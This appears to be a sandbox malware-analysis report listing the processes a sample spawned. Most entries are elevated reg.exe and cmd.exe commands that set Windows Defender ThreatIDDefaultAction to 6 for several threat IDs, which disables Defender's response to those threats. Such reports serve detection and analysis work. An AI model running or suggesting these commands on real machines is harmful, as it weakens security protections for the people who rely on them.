            Path:C:\Windows\System32\gpscript.exe
            Wow64 process (32bit):false
            Commandline:gpscript.exe /RefreshSystemParam
            Imagebase:0x7ff66dce0000
            File size:44544 bytes
            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:38
            Start time:19:04:51
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:39
            Start time:19:04:51
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:40
            Start time:19:04:52
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:41
            Start time:19:04:53
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:42
            Start time:19:04:53
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:43
            Start time:19:04:54
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:44
            Start time:19:04:54
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:45
            Start time:19:04:54
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:46
            Start time:19:04:55
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:47
            Start time:19:04:56
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:48
            Start time:19:04:56
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:49
            Start time:19:04:57
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:50
            Start time:19:04:57
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:51
            Start time:19:04:58
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:53
            Start time:19:04:58
            Start date:24/11/2022
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
            Imagebase:0xbe0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            Disassembly

            No disassembly